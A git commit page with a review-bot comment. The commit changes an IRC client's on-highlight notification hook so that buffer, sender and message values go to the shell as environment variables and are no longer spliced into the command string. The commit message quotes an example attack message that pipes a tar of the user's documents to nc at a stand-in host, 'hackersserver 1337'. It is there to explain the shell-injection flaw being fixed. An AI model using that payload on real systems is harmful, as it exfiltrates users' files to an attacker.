path: root/app.go
authorAlexey Yerin <yyp@disroot.org>2021-05-01 13:17:04 +0300
committerHubert Hirtz <hubert@hirtz.pm>2021-05-01 13:38:42 +0200
commit4b0e95116d9c637cd16a517b7fe12010a9928e9c (patch)
tree311ab1a95ddef4301f43c5d1fd1828ea29dfc6ba /app.go
parentBetter error reporting about configuration file (diff)
Use environment variables for on-highlight
Breaking change! The old approach of format modifiers is not ideal and usually has problems with shell quoting, that way anyone is able to get a remote shell just by sending a malicious message like: <evilhacker> "; tar -c $(find documents) | nc hackersserver 1337; " Given that my on-highlight is: notify-send "%b" "<%n> %m" This would be transformed into: notify-send "#cmpwn" "<evilhacker> "; tar -c $(find documents) | nc hackersserver 1337; "" And this way it becomes a huge security vulnerability. When the values are passed as environment variables and expanded inside double quotes, the shell does not re-parse the expanded text as syntax; it is handed verbatim, as a single argument, to the command being executed. Though, this requires a little update to users' on-highlight setting: %b -> $BUFFER %n -> $SENDER %m -> $MESSAGE %h -> $HERE
Diffstat (limited to 'app.go')
-rw-r--r--app.go17
1 files changed, 9 insertions, 8 deletions
diff --git a/app.go b/app.go
index a336588..61171a0 100644
--- a/app.go
+++ b/app.go
@@ -4,6 +4,7 @@ import (
"crypto/tls"
"fmt"
"net"
+ "os"
"os/exec"
"strings"
"time"
@@ -555,14 +556,14 @@ func (app *App) notifyHighlight(buffer, nick, content string) {
if buffer == app.win.CurrentBuffer() {
here = "1"
}
- r := strings.NewReplacer(
- "%%", "%",
- "%b", buffer,
- "%h", here,
- "%n", nick,
- "%m", cleanMessage(content))
- command := r.Replace(app.cfg.OnHighlight)
- output, err := exec.Command(sh, "-c", command).CombinedOutput()
+ cmd := exec.Command(sh, "-c", app.cfg.OnHighlight)
+ cmd.Env = append(os.Environ(),
+ fmt.Sprintf("BUFFER=%s", buffer),
+ fmt.Sprintf("HERE=%s", here),
+ fmt.Sprintf("SENDER=%s", nick),
+ fmt.Sprintf("MESSAGE=%s", cleanMessage(content)),
+ )
+ output, err := cmd.CombinedOutput()
if err != nil {
body := fmt.Sprintf("Failed to invoke on-highlight command: %v. Output: %q", err, string(output))
app.win.AddLine(Home, false, ui.Line{
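Review bot: The new `cmd.Env` block at `cmd.Env = append(os.Environ(), ...)` closes the injection, but only as long as the user's configured command references the variables inside double quotes; an unquoted `$MESSAGE` still undergoes word splitting and pathname globbing, and a message beginning with `-` can still be taken as an option by whatever the command invokes, so this contract deserves a comment here and a line in the on-highlight documentation. I would add above the `cmd.Env` assignment: `// Values are handed to the shell via the environment, not spliced into the command string, so message text is never parsed as shell syntax; the configured command must still quote them ("$MESSAGE") to avoid word splitting and globbing.` Note also that `os.Environ()` may already carry BUFFER/HERE/SENDER/MESSAGE from the user's session; os/exec resolves duplicate keys last-wins (Go 1.9 and later), so the appended entries override them, but that is worth stating in the same comment so nobody "fixes" the order later. The blocking `CombinedOutput()` call with no timeout predates this change and is not addressed here; notifyHighlight starts before and ends after this hunk.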